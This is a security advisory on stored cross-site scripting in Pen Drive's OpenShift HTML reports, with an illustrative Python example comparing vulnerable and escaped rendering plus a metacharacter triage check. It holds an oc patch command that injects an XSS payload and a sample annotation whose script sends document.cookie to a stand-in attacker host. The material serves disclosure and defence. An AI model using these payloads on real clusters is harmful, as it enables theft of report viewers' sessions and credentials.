A flaw was found in the Pen Drive tool's HTML report generation. When Pen Drive runs a full-run against an OpenShift cluster or a must-gather archive, it generates an HTML report containing cluster data. Cluster-sourced fields, including the ClusterVersion spec.channel, CatalogSource metadata, and Subscription configuration, are rendered directly into the HTML output without escaping or sanitization, so any HTML metacharacters in those fields become markup in the report (a stored cross-site scripting condition).

An attacker with cluster administrator privileges, or with the ability to modify a must-gather archive before it is analysed, can inject arbitrary HTML and JavaScript into cluster objects with a command such as:

oc patch clusterversion version --type merge -p '{"spec":{"channel":"stable-4.18<img src=x onerror=alert(1)>"}}'

When Pen Drive generates a report from that cluster data and another user (for example a support engineer or a cluster administrator) opens the report in a browser, the injected JavaScript executes in that user's browser context. Depending on where the report is opened (served from a web origin that holds credentials, or as a local file), this can lead to session token theft, credential exfiltration, or manipulation of the displayed content. Note that the precondition is already-privileged access to the cluster or to the archive: the impact is that this privilege is turned into code execution in the report viewer's browser, which may belong to a different, more trusted party.

The expected fix is to HTML-escape every cluster-sourced string before it is written into the report. The vulnerability was found during an internal pentest of Pen Drive version 0.1.3 and is reportedly fixed in version 1.0.0-2.
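The rendering bug described above, as an added example that is not Pen Drive's own code: the vulnerable row renderer is shown beside an escaped one, both run over constructed ClusterVersion and CatalogSource objects (shaped like `oc get ... -o json` output, with payloads of the kind the advisory shows), plus a triage walk that lists which string fields in a cluster object or must-gather document carry HTML metacharacters. All function and field names are assumptions for illustration.

```python
"""Added example, not Pen Drive's own code.

Shows how an unescaped cluster-sourced string becomes stored XSS in a
generated HTML report, the html.escape() fix, and a triage check that
flags cluster objects carrying HTML metacharacters.  Object shapes mimic
`oc get <kind> -o json`; all names here are assumptions."""
import html

# Constructed sample: a ClusterVersion whose spec.channel was set with
# `oc patch clusterversion version --type merge -p '{"spec":{"channel":"..."}}'`
CLUSTER_VERSION = {
    "apiVersion": "config.openshift.io/v1",
    "kind": "ClusterVersion",
    "metadata": {"name": "version"},
    "spec": {
        "channel": "stable-4.18<img src=x onerror=alert(1)>",
        "clusterID": "00000000-0000-0000-0000-000000000000",
    },
}

# Constructed sample: a CatalogSource carrying a payload in an annotation.
CATALOG_SOURCE = {
    "apiVersion": "operators.coreos.com/v1alpha1",
    "kind": "CatalogSource",
    "metadata": {
        "name": "redhat-operators",
        "namespace": "openshift-marketplace",
        "annotations": {
            "note": '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>'
        },
    },
    "spec": {"displayName": "Red Hat Operators", "image": "registry.example/catalog:v4.18"},
}


def walk_strings(obj, path=""):
    """Yield (dotted.path, value) for every string leaf in a nested object."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from walk_strings(value, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from walk_strings(value, f"{path}[{index}]")
    elif isinstance(obj, str):
        yield path, obj


def render_row_unsafe(label: str, value: str) -> str:
    # Vulnerable pattern: cluster-sourced text dropped straight into markup.
    return f"<tr><td>{label}</td><td>{value}</td></tr>"


def render_row_safe(label: str, value: str) -> str:
    # Fix: escape every untrusted string; quote=True also covers attribute contexts.
    return (
        f"<tr><td>{html.escape(label, quote=True)}</td>"
        f"<td>{html.escape(value, quote=True)}</td></tr>"
    )


def report(objects, row_fn) -> str:
    """Build a minimal report table from cluster objects using the given row renderer."""
    rows = []
    for obj in objects:
        prefix = f"{obj['kind']}/{obj['metadata']['name']}"
        for path, value in walk_strings(obj):
            rows.append(row_fn(f"{prefix} {path}", value))
    return "<html><body><table>" + "".join(rows) + "</table></body></html>"


# Characters that change meaning inside HTML text or attribute context.
HTML_META = set('<>"\'')


def find_markup_fields(obj) -> list:
    """Triage check for a live cluster or must-gather document: return the
    (path, value) pairs whose string values contain HTML metacharacters and
    so deserve a look before a report built from them is opened in a browser."""
    return [(path, value) for path, value in walk_strings(obj) if HTML_META & set(value)]


if __name__ == "__main__":
    for obj in (CLUSTER_VERSION, CATALOG_SOURCE):
        for path, value in find_markup_fields(obj):
            print(f"{obj['kind']}/{obj['metadata']['name']}: {path} = {value!r}")
```

Running the module prints the two flagged fields; the same `find_markup_fields` walk can be applied to each document parsed out of a must-gather archive before the archive is fed to a report generator. The escaping in `render_row_safe` is the minimum fix; a template engine with contextual auto-escaping enabled by default is the more robust choice, since it also handles values placed inside URLs, scripts, or inline styles.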